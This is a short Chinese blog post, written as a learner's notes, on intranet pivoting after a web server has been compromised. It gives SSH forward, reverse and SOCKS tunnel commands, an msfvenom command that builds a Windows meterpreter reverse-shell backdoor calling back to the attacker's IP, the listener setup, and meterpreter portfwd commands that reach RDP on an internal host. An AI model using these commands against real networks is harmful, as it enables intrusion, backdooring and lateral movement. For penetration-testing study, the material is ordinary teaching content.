SSH隧道技术及端口映射与转发

拓扑图

在这里插入图片描述
假定攻击机已拿下web服务器且无法访问数据库服务器,以下未说明的ssh命令均在web服务器上完成

ssh正向连接
ssh -CNfL 0.0.0.0:5555:10.10.10.124:80 web@127.0.0.1

正向代理完成后,可以在攻击机访问192.168.1.100:5555即可获取到10.10.10.124的80端口部署的内容。

ssh反向连接
ssh -qTfnN -R port:host:hostport remote ip
ssh -qTfnN -R 2222:127.0.0.1:22 root@192.168.0.200
攻击机:ssh -p 2222 web@127.0.0.1
       curl http://10.10.10.124

web服务器向攻击机完成反向连接后,攻击机ssh -p修改22端口为2222端口连接到web服务器使用curl命令即可访问10.10.10.124

sockets代理
ssh -qTfnN -D 10000 root@192.168.0.200

之后浏览器走192.168.0.200:10000的代理即可

端口映射

metasploit生成后门:

msfvenom -p windows/meterpreter/reverse_tcp|host=192.168.0.200|port=12345 -f exe >/var/www/html/aa.exe
msf监听模块
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.0.200
set lport 12345
exploit

在目标机上运行后面程序,攻击机上监听就会返回meterpreter会话

攻击机:portfwd flush (清除下记录)
       portfwd add -L 192.168.0.200 -l 2022 -p 80 -r 10.10.10.124

成功映射之后,访问192.168.0.200:2022即可看到10.10.10.124:80端口部署的内容

端口转发
攻击机:portfwd add -l 5555 -p 3389 -r 192.168.1.100
       rdesktop 127.0.0.1:5555

接着在meterpreter会话实现转发目标的3389端口,在攻击机本地访问127.0.0.1:5555端口即可实现远程桌面登录,进而访问10.10.10.124

开始学习内网很多地方不是很明白,若有错误还望师傅们指正。

  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值